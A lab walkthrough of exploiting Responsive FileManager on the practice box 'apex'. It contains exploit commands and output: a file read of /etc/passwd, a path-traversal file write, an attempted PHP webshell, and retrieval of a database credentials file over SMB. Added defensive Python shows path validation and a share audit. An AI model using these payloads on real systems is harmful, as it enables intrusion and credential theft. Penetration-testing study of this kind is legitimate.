Exploitation


The target web server hosts a vulnerable instance of Responsive FileManager, with multiple vulnerabilities identified.

CVE-2018-15535


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python3 CVE-2018-15535.py http://apex.offsec/ PHPSESSID=q979l7fku7b9tiiln4d8upmf16 /etc/passwd    
[*] Copy Clipboard
[*] Paste Clipboard
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
white:x:1000:1000::/home/white:/bin/sh

The exploit script for CVE-2018-15535 can be used to read files on the target system: it copies the target file and pastes it into the default directory of Responsive FileManager. Additionally, there is a system user, white.

Interestingly, the filemanager directory can also be accessed via the source directory, which presents the pasted /etc/passwd file.

CVE-2018-20793


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ curl -X POST http://$IP/filemanager/execute.php?action=create_file -b 'PHPSESSID=q979l7fku7b9tiiln4d8upmf16' -d 'paths[0]=../../../../../../../../var/www/html/source/&names[0]=CVE-2018-20793.txt&new_content=Written by CVE-2018-20793' 
File successfully saved.                                                                                                                                        

The exploit for CVE-2018-20793 allows a file write operation.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ curl -X POST http://$IP/filemanager/execute.php?action=create_file -b 'PHPSESSID=q979l7fku7b9tiiln4d8upmf16' -d 'paths[0]=../../../../../../../../var/www/html/source/&names[0]=webshell.php&new_content=<?php system($_GET['cmd']); ?>'  
File extension is not allowed. Valid extensions: txt, log, xml, html, css, htm, js,

However, it is limited to a certain set of file extensions, as the application only accepts those. Writing a webshell does not seem to be a viable option.
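The two responses above show the root cause of CVE-2018-20793: the server enforces an extension allowlist on names[0] but never checks whether paths[0] still resolves inside the upload root, so the `../` segments land the file in a different web directory. The following is an added example, not code from the write-up or from Responsive FileManager, of the server-side check that would have closed the gap: the extension allowlist copied from the page's error message, plus a path-containment check that normalises `..` segments before comparing against the root. The upload root `/var/www/html/filemanager/source` is a hypothetical value, since the page does not show the real one.

```python
import os

# Allowlist copied from the error message the application returned on the page.
ALLOWED_EXTENSIONS = {"txt", "log", "xml", "html", "css", "htm", "js"}

# Hypothetical upload root; the real Responsive FileManager root on the target is not shown.
UPLOAD_ROOT = "/var/www/html/filemanager/source"


def extension_allowed(name: str) -> bool:
    """Accept only a file name whose final extension is on the allowlist."""
    _, dot, ext = name.rpartition(".")
    # rpartition on "shell.txt.php" yields "php", so a double extension does not slip through
    return bool(dot) and ext.lower() in ALLOWED_EXTENSIONS


def resolve_inside(root: str, relative_dir: str, name: str):
    """Join root/relative_dir/name, normalise away '..' segments, and return the
    absolute path only if it is still under root; otherwise return None."""
    root_abs = os.path.abspath(root)
    candidate = os.path.abspath(os.path.join(root_abs, relative_dir, name))
    try:
        if os.path.commonpath([root_abs, candidate]) != root_abs:
            return None
    except ValueError:  # paths on different drives (Windows) share no prefix
        return None
    return candidate


def validate_create_file(root: str, relative_dir: str, name: str):
    """Mirror the create_file inputs: paths[0] is relative_dir, names[0] is name.
    Returns (accepted, reason)."""
    # names[0] must be a bare file name; separators or dot-dirs would be traversal
    if "/" in name or "\\" in name or name in ("", ".", ".."):
        return (False, "invalid file name")
    if not extension_allowed(name):
        return (False, "extension not allowed")
    # This is the check the vulnerable version lacked: paths[0] must stay inside the root
    if resolve_inside(root, relative_dir, name) is None:
        return (False, "path escapes upload root")
    return (True, "ok")


if __name__ == "__main__":
    # The traversal from the page passes the extension check but fails containment
    traversal = "../../../../../../../../var/www/html/source/"
    print(validate_create_file(UPLOAD_ROOT, traversal, "CVE-2018-20793.txt"))
    print(validate_create_file(UPLOAD_ROOT, "notes/", "CVE-2018-20793.txt"))
    print(validate_create_file(UPLOAD_ROOT, "notes/", "webshell.php"))
```

Order matters here: the name is validated before the path is joined, so a name such as `../x.txt` is rejected as a bad name rather than being silently normalised back into the root.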

OpenEMR


There is an OpenEMR instance running at the /openemr endpoint, which redirects to a login page.

Checking the source code for files that may contain credentials.

The installation guide reveals the database configuration file: openemr/sites/default/sqlconf.php.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python3 CVE-2018-15535.py http://apex.offsec/ PHPSESSID=q979l7fku7b9tiiln4d8upmf16 /var/www/openemr/sites/default/sqlconf.php 
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at apex.offsec Port 80</address>
</body></html>

Using the exploit for CVE-2018-15535, attempting to read sqlconf.php fails with a 404. Interestingly, it did copy and paste the file.

Yet it does not show up on those endpoints.

Workaround


The /source/Documents directory is shared as the docs Samba share, as enumerated earlier.

I can try to paste the target file into the /Documents directory, which will be visible on the docs Samba share.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex]
└─$ python3 CVE-2018-15535.py http://apex.offsec/ PHPSESSID=q979l7fku7b9tiiln4d8upmf16 /var/www/openemr/sites/default/sqlconf.php
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at apex.offsec Port 80</address>
</body></html>

Running the exploit for CVE-2018-15535 yielded an interesting outcome. The sqlconf.php file can be found at the /source/Documents endpoint, whereas accessing the /Documents directory through Responsive FileManager at /filemanager does not show the file, although it indicates that there are 3 files in the directory.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex/smb]
└─$ smbclient //192.168.196.145/docs
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb  6 01:56:03 2025
  ..                                  D        0  Thu Feb  6 00:02:32 2025
  sqlconf.php                         N      639  Thu Feb  6 01:56:03 2025
  OpenEMR Success Stories.pdf         A   290738  Fri Apr  9 17:47:12 2021
  OpenEMR Features.pdf                A   490355  Fri Apr  9 17:47:12 2021
 
		16446332 blocks of size 1024. 10835572 blocks available

The sqlconf.php file can also be accessed through SMB.

sqlconf.php


smb: \> get sqlconf.php 
getting file \sqlconf.php of size 639 as sqlconf.php (7.3 KiloBytes/sec) (average 7.3 KiloBytes/sec)
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/apex/smb]
└─$ cat sqlconf.php                 
<?php
//  OpenEMR
//  MySQL Config
 
$host	= 'localhost';
$port	= '3306';
$login	= 'openemr';
$pass	= 'C78maEQUIEuQ';
$dbase	= 'openemr';
 
//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;
 
$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>

The sqlconf.php file contains the DB credentials: openemr:C78maEQUIEuQ. Next, they are validated against the target MySQL server.
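The underlying exposure here is a database configuration file sitting, world-readable, on a document share that anonymous SMB users can list. As an added example (not part of the write-up, and not OpenEMR or Samba code), the script below walks a share root and reports PHP files that assign the connection variables sqlconf.php uses, together with whether the file is world-readable. The demo share it builds is constructed in a temporary directory; its sqlconf.php is modelled on the page's file but carries a placeholder password, and the other two files are stand-ins for the PDFs listed in the smbclient output.

```python
import os
import re
import stat
import tempfile

# Matches PHP scalar assignments such as  $pass = 'secret';  (single- or double-quoted).
ASSIGN_RE = re.compile(r"""^\s*\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""", re.MULTILINE)

# Variable names OpenEMR's sqlconf.php uses for the database connection (taken from the page).
DB_CREDENTIAL_VARS = {"host", "port", "login", "pass", "dbase"}


def audit_share(share_root: str):
    """Walk a share and report PHP files that carry database credentials.
    Returns a sorted list of (relative_path, sorted variable names, world_readable)."""
    findings = []
    for dirpath, _, files in os.walk(share_root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            assigned = {m.group(1) for m in ASSIGN_RE.finditer(text)}
            hits = assigned & DB_CREDENTIAL_VARS
            # A file assigning both a login and a password is a credential leak on a document share
            if {"login", "pass"} <= hits:
                world_readable = bool(os.stat(path).st_mode & stat.S_IROTH)
                findings.append((os.path.relpath(path, share_root), sorted(hits), world_readable))
    return sorted(findings)


def build_demo_share() -> str:
    """Constructed stand-in for the docs share (hypothetical content, placeholder password)."""
    root = tempfile.mkdtemp(prefix="docs_share_")
    sqlconf = (
        "<?php\n//  OpenEMR\n//  MySQL Config\n"
        "$host\t= 'localhost';\n$port\t= '3306';\n$login\t= 'openemr';\n"
        "$pass\t= 'PLACEHOLDER-NOT-THE-REAL-PASSWORD';\n$dbase\t= 'openemr';\n"
        "$config = 1;\n?>\n"
    )
    with open(os.path.join(root, "sqlconf.php"), "w", encoding="utf-8") as fh:
        fh.write(sqlconf)
    os.chmod(os.path.join(root, "sqlconf.php"), 0o644)  # world-readable, as on the share
    # Harmless neighbours: a PHP file without credentials and a binary document stand-in
    with open(os.path.join(root, "helper.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n$title = 'OpenEMR Features';\n?>\n")
    with open(os.path.join(root, "OpenEMR Features.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4 constructed placeholder\n")
    return root


if __name__ == "__main__":
    for rel, vars_found, readable in audit_share(build_demo_share()):
        print(f"{rel}: assigns {', '.join(vars_found)}; world-readable={readable}")
```

Running the same walk against the real mount point of a share turns the "which files should not be here" question into a repeatable check, and the world-readable flag separates a misplaced file from one that is also exposed to every local account.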